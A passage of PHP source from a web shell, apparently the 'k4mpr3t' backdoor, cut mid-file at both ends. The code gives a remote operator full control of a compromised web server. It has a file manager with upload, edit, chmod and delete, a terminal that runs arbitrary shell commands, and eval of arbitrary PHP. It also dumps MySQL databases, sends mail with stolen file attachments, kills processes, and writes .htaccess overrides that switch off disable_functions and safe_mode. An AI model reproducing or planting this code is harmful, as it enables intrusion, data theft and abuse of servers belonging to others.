",
php_uname(),server_software,
server_name,server_name,gethostbyname(http_host),server_port,
B64D($account[0]),remote_addr,remote_port,
GetUser("usr"),GetUser("uid"),GetUser("grp"),GetUser("gid"),
GetFileSize(@disk_free_space($dir)),GetFileSize(@disk_total_space($dir)),
php_sapi_name(),GetSafeMode(),php_self,$config['title'],$config['tagline'],
MainMenu(),MapDrive($map),MapDirectory($map),$map
);
if(any("g",$_REQUEST))
{
$g=$_REQUEST['g'];
if (is_dir($g))
{
header('location:'.php_self.'?d='.urle($g));
}
elseif(is_file($g)||is_link($g))
{
header('location:'.php_self.'?a=v&r='.urle($g));
}
else
{
header('location:'.php_self);
}
}
if(any("d",$_REQUEST)||request_uri===script_name)
{
$_SESSION['c']=urle($dir);
if(any("file",$_REQUEST)&&$_REQUEST['file']=="New File")
{
$file=trim($dir._.$_REQUEST['what']);
if(file_exists($file))
{
printf("
Can't create New File!");
}
else
{
$mf=@fopen($file,"w");
fclose($mf);
header("location:".php_self."?a=e&r=".urle($file));
}
}
if(any("directory",$_REQUEST)&&$_REQUEST['directory']=="New Dir")
{
$dire=trim($_REQUEST['what']);
@chdir($dir);
if(!@mkdir($dire))
{
printf("
Can't create New Directory!");
}
else
{
printf("
Directory '%s' Created on %s",$dire,GetFileTime($dir._.$dire,'create'));
}
}
if(any("upload",$_REQUEST)&&$_REQUEST['upload']=="Upload")
{
$upload=$dir._.trim(basename($_FILES["what"]["name"]));
if(move_uploaded_file($_FILES["what"]["tmp_name"],$upload))
{
printf("
File %s has been uploaded",basename($_FILES["what"]["name"]));
}
else
{
printf("
✕ Can't upload new file! ✕");
}
}
if($handle=@opendir($dir))
{
$reads=array();
$count_dirs=0;
$count_files=0;
while(false!==($file=readdir($handle)))
{
$filedir=rtrim($dir,_)._.$file;
$updir=substr($dir,0,strrpos($dir,_));
if (strlen($updir)<=2) $updir=$updir._;
$type=GetFileType($filedir);
$size=GetFileSize(@filesize($filedir));
$last=GetFileTime($filedir,"modify");
$perm=GetFilePerm($filedir);
$owner=GetOwnerGroup($filedir);
$mime=@mime_content_type($filedir);
$view="";
if(strpos($mime,'image')!==false)
{
$view="?a=v&w=i&r=".urle($filedir);
}
elseif(strpos($mime,'video')!==false)
{
$view="?a=v&w=v&r=".urle($filedir);
}
elseif(strpos($mime,'audio')!==false)
{
$view="?a=v&w=a&r=".urle($filedir);
}
else
{
$view="?a=v&r=".urle($filedir);
}
if($file==".")
{
$reads[]="
| . | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
}
elseif($file=="..")
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
}
else
{
if($type=="dir")
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ✘ ℳ |
";
$count_dirs++;
}
else
{
$reads[]="
| ".$file." | ".$type." | ".$size." | ".$perm." | ".$owner." | ".$last." | ℳ ✘ ➥ |
";
$count_files++;
}
}
}
sort($reads);
$filesdirs="";
foreach($reads as $read)
{
$filesdirs.=$read;
}
printf("
",
urle($dir),
urle($dir),
urle($dir),
$filesdirs,
$count_dirs,
$count_files
);
closedir($handle);
}
else
{
print "
Can't Open Location";
}
}
if(any("r",$_REQUEST))
{
if(file_exists(urld($_REQUEST["r"])))
{
$file=strval(urld($_REQUEST["r"]));
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$back=php_self."?d=".urle($dir);
printf("
Name | %s |
Size | %s |
Permission | %s |
Create time | %s |
Last modified | %s |
Last accessed | %s |
MIME | %s |
Owner/Group | %s |
MD5 | %s |
SHA1 | %s |
",
basename($file),
GetFileSize(@filesize($file)),
GetFilePerm($file),
GetFileTime($file,"create"),
GetFileTime($file,"modify"),
GetFileTime($file,"access"),
mime_content_type($file),
GetFileOwnerGroup($file),
@md5_file($file),
@sha1_file($file)
);
if(is_file($file)||is_link($file))
{
$menu=array(
"Back" => "?a=b&r=",
"Edit" => "?a=e&r=",
"View" => "?a=v&r=",
"Copy" => "?a=cp&r=",
"Move" => "?a=mv&r=",
"Download" => "?a=d&r=",
"Hexdump" => "?a=h&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
elseif(is_dir($file))
{
$menu=array(
"Back" => "?a=b&r=",
"Chmod" => "?a=c&r=",
"Chown" => "?a=cwn&r=",
"Chgrp" => "?a=cgp&r=",
"Touch" => "?a=t&r=",
"Rename" => "?a=r&r=",
"Delete" => "?a=x&r="
);
}
$nu="";
foreach($menu as $key => $val)
{
$idxkey=substr($val,1,1);
$idxval=substr($val,3,strpos($val,'&')-3);
$active=any($idxkey,$_REQUEST)&&$_REQUEST[$idxkey]==$idxval?"class='active'":"";
if($key=="Delete")
{
$nu.="
".$key."";
}
elseif($key=="Back")
{
$nu.="
".$key."";
}
else
{
$nu.="
".$key."";
}
}
printf("",$nu);
if($_REQUEST['a']=='e')
{
$source="";
if(filesize($file) > 5242880)
{
$source.="Lazy to Read more than 5MB Files";
}
else
{
$open=fopen($file,'r');
if($open)
{
while(!feof($open))
{
$source.=htmlentities(fread($open,(1024*4)));
}
fclose($open);
}
}
printf("
",$source,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("save",$_REQUEST))
{
$new_source=$_REQUEST['sourcecode'];
if(function_exists("chmod")) chmod($file,0755);
$source_edit=fopen($file,'w+');
$tulis=fwrite($source_edit,$new_source);
fclose($source_edit);
if($tulis)
{
$_SESSION['status']="File Saved ! ".GetFileTime($file,"modify")." | ".GetFileSize(filesize($file));
}
else
{
$_SESSION['status']="Whoops, something went wrong...";
}
header("location:".php_self."?a=e&r=".urle($file));
}
}
if($_REQUEST['a']=='r')
{
printf("
",basename($file),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("rename",$_REQUEST))
{
$path=pathinfo(trim($file));
$newname=$path['dirname']._.trim($_REQUEST['name']);
if(!rename(trim($file),$newname))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Renamed file with success';
}
header("location:".php_self."?a=r&r=".urle($newname));
}
}
if($_REQUEST['a']=='c')
{
printf("
",substr(decoct(fileperms($file)),2),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chmod",$_REQUEST))
{
$octal=octdec($_REQUEST['octal']);
if(!chmod(trim($file),$octal))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chmod file with success';
}
header("location:".php_self."?a=c&r=".urle($file));
}
}
if($_REQUEST['a']=='cwn')
{
$own='';
if(function_exists('posix_getpwuid'))
{
$user=posix_getpwuid(fileowner($x));
$own=$user['name'];
}
printf("
",$own,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chown",$_REQUEST))
{
$own=$_REQUEST['own'];
if(!chown(trim($file),$own))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chown file with success';
}
header("location:".php_self."?a=cwn&r=".urle($file));
}
}
if($_REQUEST['a']=='cgp')
{
$grp='';
if(function_exists('posix_getgrgid'))
{
$group=posix_getgrgid(filegroup($x));
$grp=$group['name'];
}
printf("
",$grp,$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("chgrp",$_REQUEST))
{
$grp=$_REQUEST['grp'];
if(!chgrp(trim($file),$grp))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Chgrp file with success';
}
header("location:".php_self."?a=cgp&r=".urle($file));
}
}
if($_REQUEST['a']=='t')
{
printf("
",GetFileTime($file,"modify"),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("touch",$_REQUEST))
{
$time=$_REQUEST['time'];
if(!touch(trim($file),strtotime($time)))
{
$_SESSION['status']='Whoops, something went wrong...';
}
else
{
$_SESSION['status']='Touched file with success';
}
header("location:".php_self."?a=t&r=".urle($file));
}
}
if($_REQUEST['a']=='v')
{
printf("",
urle($file),urle($file),
urle($file),urle($file),
urle($file));
if(is_readable($file))
{
if(any("w",$_REQUEST))
{
$url=GetUrlFromPath($file);
$type=end(explode(".",$file));
if($_REQUEST['w']=='f')
{
printf("
--> New Tab <--",$url,$url);
}
if($_REQUEST['w']=='i')
{
printf("
",$url);
}
if($_REQUEST['w']=='v')
{
printf("
",$url,$type);
}
if($_REQUEST['w']=='a')
{
printf("
",$url,$type);
}
}
else
{
if(filesize($file) > 5242880)
{
printf("Lazy to Read more than 5MB Files");
}
else
{
$code=highlight_file($file,true);
printf("
%s
",$code);
}
}
}
}
if($_REQUEST['a']=='h')
{
$c=file_get_contents($file);
$n=0;
$h=array('00000000
','','');
$len=strlen($c);
for($i=0;$i<$len;++$i)
{
$h[1].=sprintf('%02X',ord($c[$i])).' ';
switch(ord($c[$i]))
{
case 0: $h[2].=' ';break;
case 9: $h[2].=' ';break;
case 10:$h[2].=' ';break;
case 13:$h[2].=' ';break;
default:$h[2].=$c[$i];break;
}
$n++;
if($n==32)
{
$n=0;
if($i+1 < $len)
{
$h[0].=sprintf('%08X',$i+1).'
';
}
$h[1].='
';
$h[2].="\n";
}
}
printf("
",$h[0],$h[1],htmlspecialchars($h[2]));
}
if($_REQUEST['a']=='cp'||$_REQUEST['a']=='mv')
{
printf("
",$file,($_REQUEST['a']=='cp'?'Copy':'Move'),$status);
if(any("status",$_SESSION)) unset($_SESSION['status']);
if(any("submit",$_REQUEST))
{
$source=$file;
$dest=$_REQUEST['file-dest'];
if(!file_exists($dest))
{
if ($_REQUEST['a']=='cp')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot copying...';
}
else
{
$_SESSION['status']="Copy file with success
'" . basename($dest) . "'";
}
}
elseif($_REQUEST['a']=='mv')
{
if(!copy(trim($source),trim($dest)))
{
$_SESSION['status']='Whoops, cannot moving...';
}
else
{
if(Remove($source))
{
$_SESSION['status']="Move file with success";
$file=$dest;
}
else
{
$_SESSION['status']='Whoops, just copying...';
}
}
}
}
else
{
$_SESSION['status']="Whoops, File was Exists
'" . basename($dest) . "'";
}
if($_REQUEST['a']=='cp')
{
header("location:".php_self."?a=cp&r=".urle($file));
}
elseif($_REQUEST['a']=='mv')
{
header("location:".php_self."?a=mv&r=".urle($file));
}
}
}
if($_REQUEST['a']=='d')
{
if(file_exists($file))
{
header('Cache-Control:must-revalidate,post-check=0,pre-check=0');
header('Content-Disposition:attachment;filename='.basename($file));
header('Content-Type:application/octet-stream');
header('Content-Description:File Transfer');
header('Content-Transfer-Encoding:binary');
header('Content-Length:'.filesize($file));
header('Pragma:public');
header('Expires:0');
ob_clean();
readfile($file);
exit;
}
}
if($_REQUEST['a']=='x')
{
if(file_exists($file))
{
if(Remove($file))
{
header("location:".$back);
}
}
print '
Cannot Delete';
}
}
else
{
print '
File Not Found';
}
}
if(any("x",$_REQUEST))
{
if($_REQUEST['x']=="logout")
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
if($_REQUEST['x']=="secure")
{
$disable_functions=array_filter(array_map('trim',explode(',',ini_get("disable_functions"))));
$security=array('_xyec','allow_url_fopen','allow_url_include','apache_child_terminate','apache_get_modules','apache_getenv',
'apache_note','apache_setenv','base64_decode','chdir','chgrp','chmod','chown','curl_exec','curl_multi_exec','dbase_open',
'dbmopen','define_syslog_variables','disk_free_space','disk_total_space','diskfreespace','dl','dlopen','escapeshellarg',
'escapeshellcmd','eval','exec','extract','filepro','filepro_retrieve','filepro_rowcount','fopen_with_path','fp','fput',
'fputs','ftp_connect','ftp_exec','ftp_get','ftp_login','ftp_nb_fput','ftp_put','ftp_raw','ftp_rawlist','geoip_open',
'get_cfg_var','get_current_user','get_num_redirects','getcwd','getenv','getlastmo','getmygid','getmyinode','getmypid',
'getmyuid','getrusage','gzinflate','gzuncompress','highlight_file','hpAds_xmlrpcEncode','ini_alter','ini_get_all',
'ini_restore','ini_set','inject_code','leak','link','listen','mainwork','mb_send_mail','mkdir','mkfifo','move_uploaded_file',
'mysql_list_dbs','mysql_pconnect','openlog','parse_ini_file','passthru','pcntl_alarm','pcntl_exec','pcntl_fork',
'pcntl_get_last_error','pcntl_getpriority','pcntl_setpriority','pcntl_signal','pcntl_signal_dispatch','pcntl_sigprocmask',
'pcntl_sigtimedwait','pcntl_sigwaitinfo','pcntl_strerrorp','pcntl_wait','pcntl_waitpid','pcntl_wexitstatus','pcntl_wifexited',
'pcntl_wifsignaled','pcntl_wifstopped','pcntl_wstopsig','pcntl_wtermsig','pfsockopen','phpAds_XmlRpc','phpAds_remoteInfo',
'phpAds_xmlrpcDecode','phpAds_xmlrpcEncode','php_uname','phpinfo','popen','posix_getgrgid','posix_getlogin','posix_getpwuid',
'posix_kill','posix_mkfifo','posix_setpgid','posix_setsid','posix_setuid','posix_ttyname','posix_uname','posixc','proc_close',
'proc_get_stats','proc_get_status','proc_nice','proc_open','proc_terminate','ps_aux','putenv','readlink','rename','rmdir',
'runkit_function_rename','set_time_limit','sh2_exec','shell_exec','show_source','sleep','socket_accept','socket_bind',
'socket_clear_error','socket_close','socket_connect','socket_create','socket_create_listen','socket_create_pair',
'socket_get_option','socket_getpeername','socket_getsockname','socket_last_error','socket_listen','socket_read',
'socket_recv','socket_recvfrom','socket_select','socket_send','socket_sendto','socket_set_block','socket_set_nonblock',
'socket_set_option','socket_shutdown','socket_strerror','socket_write','str_rot13','stream_select','stream_socket_server',
'symlink','syslog','system','tp_exec','virtual','xmlrpc_entity_decode');
sort($security);
$fucks=array_unique(array_merge($disable_functions,$security));
$table="";
$enable=0;
$disable=0;
$die=array();
$ready=array();
$off=array();
$total=count($fucks);
foreach($fucks as $fuck)
{
$table.="
| $fuck | ";
if(in_array($fuck,$disable_functions))
{
$table.="DIE";
$die[]=$fuck;
$disable++;
}
else
{
if(function_exists($fuck)||is_callable($fuck))
{
$table.="READY";
$ready[]=$fuck;
$enable++;
}
else
{
$table.="OFF";
$off[]=$fuck;
$disable++;
}
}
$table.=" |
";
}
$risk=($enable/$total)*100;
$secure=($disable/$total)*100;
printf("
Sec. Info v2.0.%s
Risks Rate [%s%%] | Secure Rate [%s%%]
No. |
Disable Function |
Status |
%s
",$total,round($risk,2),round($secure,2),$table,implode($ready, ', '),implode($off, ', '),implode($die, ', '));
}
if($_REQUEST['x']=="info")
{
printf("
");
$cores=array('PHP_VERSION','PHP_MAJOR_VERSION','PHP_MINOR_VERSION','PHP_RELEASE_VERSION','PHP_VERSION_ID',
'PHP_EXTRA_VERSION','PHP_ZTS','PHP_DEBUG','PHP_MAXPATHLEN','PHP_OS','PHP_OS_FAMILY','PHP_SAPI',
'PHP_EOL','PHP_INT_MAX','PHP_INT_MIN','PHP_INT_SIZE','PHP_FLOAT_DIG','PHP_FLOAT_EPSILON',
'PHP_FLOAT_MIN','PHP_FLOAT_MAX','DEFAULT_INCLUDE_PATH','PEAR_INSTALL_DIR','PEAR_EXTENSION_DIR',
'PHP_EXTENSION_DIR','PHP_PREFIX','PHP_BINDIR','PHP_BINARY','PHP_MANDIR','PHP_LIBDIR','PHP_DATADIR',
'PHP_SYSCONFDIR','PHP_LOCALSTATEDIR','PHP_CONFIG_FILE_PATH','PHP_CONFIG_FILE_SCAN_DIR',
'PHP_SHLIB_SUFFIX','PHP_FD_SETSIZE');
$table="";
foreach($cores as $core)
{
$table.="
".$core." | ".@constant($core)." |
";
}
printf("
Core Predefined Constants
Predefined Constants |
Value |
%s
",$table);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="envirolment")
{
ob_clean();
phpinfo($_REQUEST['config']);
$phpinfo=ob_get_contents();
ob_end_clean();
$phpinfo=preg_replace('%^.*(.*).*$%ms','$1',$phpinfo);
printf("
%s
",$phpinfo);
exit;
}
}
if($_REQUEST['x']=="db")
{
$connect=any("connect",$_SESSION)?$_SESSION['connect']:"";
$status=any("status",$_SESSION)?$_SESSION['status']:"";
$query=any("query",$_REQUEST)?$_REQUEST['query']:"show databases;";
if($connect=='true')
{
$process="";
$sql=mysql_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass']);
$result=mysql_list_processes($sql);
while($row=mysql_fetch_assoc($result))
{
$process.=sprintf("
%s | %s | %s |
%s | %s |
",
$row["Id"],$row["Host"],$row["db"],
$row["Command"],$row["Time"]);
}
mysql_free_result($result);
printf("
",$query,$process,$dir,$status);
}
else
{
printf("
");
}
if(any("rs",$_REQUEST))
{
$_SESSION[$_REQUEST['rs']]='';
}
if(any("cd",$_REQUEST))
{
$_SESSION['qdb']=$_REQUEST['cd'];
}
if(any("ct",$_REQUEST))
{
$_SESSION['qtb']=$_REQUEST['ct'];
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="db")
{
$cn=mysqli_connect($_REQUEST['host'],$_REQUEST['user'],$_REQUEST['pass'],$_REQUEST['dbas'],$_REQUEST['port']);
$_SESSION['host']=$_REQUEST['host'];
$_SESSION['port']=$_REQUEST['port'];
$_SESSION['user']=$_REQUEST['user'];
$_SESSION['pass']=$_REQUEST['pass'];
$_SESSION['dbas']=$_REQUEST['dbas'];
if($cn)
{
$_SESSION['connect']='true';
header('location:'.php_self.'?x=db');
}
else
{
$_SESSION['connect']='false';
printf("
Connection Failed");
}
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="qry")
{
$_SESSION['status']='';
$con=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],$_SESSION['dbas'],$_SESSION['port']);
if(isset($_REQUEST['disconnect']))
{
mysqli_close($con);
unset($_SESSION['connect']);
unset($_SESSION['query']);
unset($_SESSION['host']);
unset($_SESSION['user']);
unset($_SESSION['pass']);
unset($_SESSION['dbas']);
unset($_SESSION['qdb']);
unset($_SESSION['qtb']);
header('location:'.php_self.'?x=db');
}
$sql=!empty($_REQUEST['query'])?$_REQUEST['query']:"show databases;";
$result=mysqli_query($con,$sql);
$data=array();
$name=array();
if($result)
{
while($fieldinfo=mysqli_fetch_field($result))
{
$name[]=$fieldinfo->name;
}
$data[]=$name;
while($row=mysqli_fetch_row($result))
{
$data[]=$row;
}
mysqli_free_result($result);
}
else
{
$data=false;
}
if($data!==false)
{
$sqdb=@$_SESSION['qdb'];
$sqtb=@$_SESSION['qtb'];
$bsdb="
Database";
$bqdb=!empty($_SESSION['qdb'])?"→
$sqdb":"";
$bqtb=!empty($_SESSION['qtb'])?"→
$sqtb":"";
printf("
%s %s %s
",$bsdb,$bqdb,$bqtb);
foreach($data as $key => $val)
{
if(is_array($val))
{
if($key==0)
{
print "☰ | ";
foreach($val as $key2 => $val2)
{
if(!is_array($val2))
{
print "".$val2." | ";
}
}
print "
";
}
else
{
print " | ";
foreach($val as $key3 => $val3)
{
if(!is_array($val3))
{
if(strpos($val2,'Database')!==false)
{
print "$val3 | ";
}
elseif(strpos($val2,'Tables')!==false)
{
$val4=substr($val2,strpos($val2,'Tables_in_')+10);
print "$val3 | ";
}
else
{
print "$val3 | ";
}
}
}
print "
";
}
}
}
print "
";
}
else
{
print '
Query not Executed';
}
}
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="dmp")
{
$database=$_REQUEST['database'];
$output=$_REQUEST['output'];
if (!file_exists($output)&&!empty($database))
{
$link=mysqli_connect($_SESSION['host'],$_SESSION['user'],$_SESSION['pass'],null,$_SESSION['port']);
mysqli_set_charset($link,'utf8');
mysqli_select_db($link,$database);
$tables=array();
$result=mysqli_query($link,'SHOW TABLES');
while($row=mysqli_fetch_row($result))
{
$tables[]=$row[0];
}
$return='SET FOREIGN_KEY_CHECKS=0;' . "\r\n";
$return.='SET SQL_MODE="NO_AUTO_VALUE_ON_ZERO";' . "\r\n";
$return.='SET AUTOCOMMIT=0;' . "\r\n";
$return.='START TRANSACTION;' . "\r\n";
foreach($tables as $table)
{
$result=mysqli_query($link,'SELECT * FROM '.$table);
$num_fields=mysqli_num_fields($result);
$num_rows=mysqli_num_rows($result);
$i_row=0;
$row2=mysqli_fetch_row(mysqli_query($link,'SHOW CREATE TABLE '.$table));
$return.="\n\n".$row2[1].";\n\n";
if ($num_rows!==0) {
$row3=@mysqli_fetch_fields($result);
$return.='INSERT INTO '.$table.'( ';
foreach ($row3 as $th)
{
$return.='`'.$th->name.'`,';
}
$return=substr($return,0,-2);
$return.=' ) VALUES';
for ($i=0;$i < $num_fields;$i++)
{
while($row=mysqli_fetch_row($result))
{
$return.="\n(";
for($j=0;$j<$num_fields;$j++)
{
$row[$j]=addslashes($row[$j]);
$row[$j]=preg_replace("#\n#","\\n",$row[$j]);
if (isset($row[$j])) { $return.='"'.$row[$j].'"';}else { $return.='""';}
if ($j<($num_fields-1)) { $return.=',';}
}
if (++$i_row==$num_rows) {
$return.=");";
}else {
$return.="),";
}
}
}
}
$return.="\n\n\n";
}
$return .='SET FOREIGN_KEY_CHECKS=1;' . "\r\n";
$return.='COMMIT;';
$output=end(explode(".",$output))=='sql'?$output:$output.'.sql';
$handle=fopen($output,'w+');
fwrite($handle,$return);
fclose($handle);
$_SESSION['status']=sprintf("Dump with success...
'%s'",urle($output),basename($output));
}
else
{
$_SESSION['status']="
Dump Error";
}
header('location:'.php_self.'?x=db');
}
}
if($_REQUEST['x']=="terminal")
{
printf("
",Execute('whoami'),$dir);
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals")
{
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
@chdir($dir);
$charset='UTF-8';
if(!Unix())
{
$charset='Windows-1251';
}
$ret=iconv($charset,'UTF-8',Execute($command));
print $ret;
exit;
}
elseif(any("xa",$_REQUEST)&&$_REQUEST['xa']=="terminals-curdir")
{
ob_clean();
$command=!empty($_REQUEST['cmd'])?$_REQUEST['cmd']:"whoami";
if (preg_match('/cd (.*)/',$command,$dirx))
{
if ($dirx[1]=='..')
{
$dir=substr($dir,0,strrpos($dir,_));
if (strlen($dir)<=2) $dir=$dir._;
}
else
{
if (is_dir($dirx[1]))
{
$dir=realpath($dirx[1]);
}
}
}
$_SESSION['c']=urle($dir);
print '$ '.$dir.':';
exit;
}
}
if($_REQUEST['x']=="connect")
{
printf("
");
}
if($_REQUEST['x']=="htaccess")
{
$php_ini=array(
"php_value upload_max_filesize 32M",
"php_value post_max_size 32M",
"php_flag safe_mode Off",
"php_value disable_functions null",
"php_flag safe_mode_gid Off",
"php_value open_basedir $dir",
"php_flag register_globals On",
"php_flag exec On",
"php_flag shell_exec On");
$htaccess=array(
"Options All",
"Allow From All",
"Satisfy Any");
printf("
",implode($php_ini,"\n"),implode($htaccess,"\n"));
}
if($_REQUEST['x']=="php")
{
$exp=array(
"print_r(get_extension_funcs('Core'));",
"print_r(get_loaded_extensions());",
"print_r(ini_get_all('pcre'));",
"print_r(ini_get_all());",
"print_r(get_defined_constants());",
"print_r(get_defined_functions());",
"print_r(get_declared_classes());");
printf("
",implode($exp,"\n"));
if(any("code",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['code']);
$evil=Evil($code);
exit;
}
if(any("codex",$_REQUEST))
{
ob_clean();
$code=trim($_REQUEST['codex']);
$evil=Evil($code,true);
exit;
}
}
if($_REQUEST['x']=="perl")
{
print 'PHP Perl Class: '.(class_exists('Perl')?"
ON":"
OFF").'
';
if(Unix())
{
if(file_exists("/usr/bin/perl"))
{
$path_perl="/usr/bin/perl";
}
else
{
$path_perl="/usr/bin/env perl";
}
}
else
{
if(file_exists("C:\\perl\bin\perl.exe"))
{
$path_perl="C:\\perl\bin\perl.exe";
}
elseif(file_exists("C:\\wamp\bin\perl.exe"))
{
$path_perl="C:\\wamp\bin\perl.exe";
}
elseif(file_exists("C:\\xampp\perl\bin\perl.exe"))
{
$path_perl="C:\\xampp\perl\bin\perl.exe";
}
}
$script=array(
"#!$path_perl",
"use strict;",
"use warnings;",
"use CGI;",
"print CGI::header();",
"print 'k4mpr3t on CGI';");
$htaccess=array(
"Options +ExecCGI +SymLinksIfOwnerMatch",
"DirectoryIndex index.ler",
"AddType application/x-httpd-cgi .ler",
"AddHandler cgi-script .ler");
$path=$dir._.'cgi-bin';
$file=$path._.'perl.ler';
$file2=$path._.'.htaccess';
$scripts=implode($script,"\n");
$htaccesss=implode($htaccess,"\n");
if(!is_dir($path))
{
mkdir($path,0755);
}
if(!is_file($file))
{
$op=fopen($file,'w+');
fwrite($op,$scripts);
fclose($op);
chmod($file,0755);
}
if(!is_file($file2))
{
$op=fopen($file2,'w+');
fwrite($op,$htaccesss);
fclose($op);
chmod($file2,0755);
}
$redirect=GetUrlFromPath($file);
printf("Tested ->
Link");
if (class_exists('Perl'))
{
//$perl=Perl::getInstance();
$perl=new Perl();
$perl->eval("print \"Executing Perl code in PHP\n\"");
print "Hello from PHP! ";
//$perl=new Perl();
$perl->require($file);
$val=$perl->somePhpFunc('test');
print $val;
}
}
if($_REQUEST['x']=="mail")
{
printf("
",php_self);
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='send')
{
ob_clean();
$from=$_REQUEST['from'];
$reply=$_REQUEST['reply'];
$to=$_REQUEST['to'];
$cc=$_REQUEST['cc'];
$bcc=$_REQUEST['bcc'];
$subject=$_REQUEST['subject'];
$msg=$_REQUEST['message'];
$attachment=$_REQUEST['attachment'];
$uid=md5(uniqid(time()));
$headers[]="From: $from";
$headers[]="Reply-To: $reply";
$headers[]="To: $to";
if(!empty($cc)) $headers[]='Cc: $cc';
if(!empty($bcc)) $headers[]='Bcc: $bcc';
$headers[]="MIME-Version: 1.0";
$headers[]="Content-Type: multipart/mixed; boundary=\"$uid\"";
$messages[]="--$uid";
$messages[]="Content-type: text/html; charset=\"iso-8859-1\"";
$messages[]="Content-Transfer-Encoding: 8bit";
$messages[]="";
$messages[]="$msg";
$messages[]="";
if(is_file($attachment))
{
$content=file_get_contents($attachment);
$content=chunk_split(base64_encode($content));
$name=basename($attachment);
$mime=mime_content_type($attachment);
$messages[]="--$uid";
$messages[]="Content-Type: $mime; name=\"$name\"";
$messages[]="Content-Transfer-Encoding: base64";
$messages[]="Content-Disposition: attachment";
$messages[]="";
$messages[]="$content";
$messages[]="";
$messages[]="--$uid--";
}
$message=implode("\r\n",$messages);
$header=implode("\r\n",$headers);
if(mail($to,$subject,$message,$header))
{
print "Email Send";
}
else
{
$error=error_get_last();
print "Error :" . $error['message'];
}
exit;
}
}
if($_REQUEST['x']=='process')
{
printf("
");
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="kill")
{
$pid=$_REQUEST['pid'];
$name=$_REQUEST['name'];
if(Unix())
{
$kill=Execute("kill 9 $pid");
$kill=Execute("kill 9 $name");
if($kill) print '
Process Killed';
}
else
{
$kill=Execute("taskkill /f /pid $pid");
$kill=Execute("taskkill /f /im $name");
if($kill) print '
Process Killed';
}
}
if(Unix())
{
$ret=iconv('UTF-8','UTF-8',Execute('ps aux'));
print '
';
}
else
{
$ret=iconv('Windows-1251','UTF-8',Execute('tasklist'));
print '
';
}
}
if($_REQUEST['x']=='shells')
{
print "Coming Soon";
}
if($_REQUEST['x']=='symlink')
{
print "Coming Soon";
}
if($_REQUEST['x']=="account")
{
printf("
",B64D($account[0]));
if(any("xa",$_REQUEST)&&$_REQUEST['xa']=="change")
{
$filename=script_filename;
$username=$_REQUEST['change-password'];
$password=$_REQUEST['change-username'];
if (!empty($username)&&!empty($password))
{
$user_from=$account[0];
$user_to=B64E($password);
$content=file_get_contents($filename);
$chunk=explode($user_from,$content);
$content=implode($user_to,$chunk);
$change=file_put_contents($filename,$content);
$pass_from=$account[1];
$pass_to=sha1(md5($username));
$content=file_get_contents($filename);
$chunk=explode($pass_from,$content);
$content=implode($pass_to,$chunk);
$change=file_put_contents($filename,$content);
if($change)
{
session_destroy();
session_regenerate_id();
header('location:'.php_self);
}
else
{
printf("Error change account");
}
}
else
{
printf("
Mistakes !");
}
}
}
if($_REQUEST['x']=="action")
{
$files=any('chk',$_REQUEST)?$_REQUEST['chk']:array();
$value=any('action-value',$_REQUEST)?$_REQUEST['action-value']:$_REQUEST['action-option'];
$tmp="";
$row="";
$count_dirs=0;
$count_files=0;
foreach($files as $file)
{
if(is_dir(urld($file)))
{
$count_dirs++;
}
if(is_file(urld($file)))
{
$count_files++;
}
$row.="
".urld($file)." |
";
$tmp.=urld($file).",";
}
if(count($files)==1&&$value=='copy')
{
header('location:'.php_self.'?a=cp&r='.$files[0]);
}
if(count($files)==1&&$value=='move')
{
header('location:'.php_self.'?a=mv&r='.$files[0]);
}
if(!any('xa',$_REQUEST)&&$value=='delete')
{
printf("
Dir's: [%s] File's: [%s]
",
$count_dirs,
$count_files,
$row,
$value,
$tmp);
}
if(!any('xa',$_REQUEST)&&$value!='delete')
{
printf("
Dir's: [%s] File's: [%s]
",
$count_dirs,
$count_files,
$row,
$value,
$tmp,
$dir._);
}
if(any('xa',$_REQUEST)&&$_REQUEST['xa']=='option')
{
$files=array_filter(explode(',',$_REQUEST['tmp']));
$newloc=trim(@$_REQUEST['newloc']);
$succ=0;
$fail=0;
if($_REQUEST['action-option']=='copy')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(CopyRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='move')
{
if(file_exists($newloc)&&is_dir($newloc))
{
foreach($files as $file)
{
if(MoveRecursive($file,rtrim($newloc,_)._.basename($file)))
{
$succ++;
}
else
{
$fail++;
}
}
print "Success: $succ | Failed: $fail";
}
else
{
print "Target not exists !";
}
}
if($_REQUEST['action-option']=='delete')
{
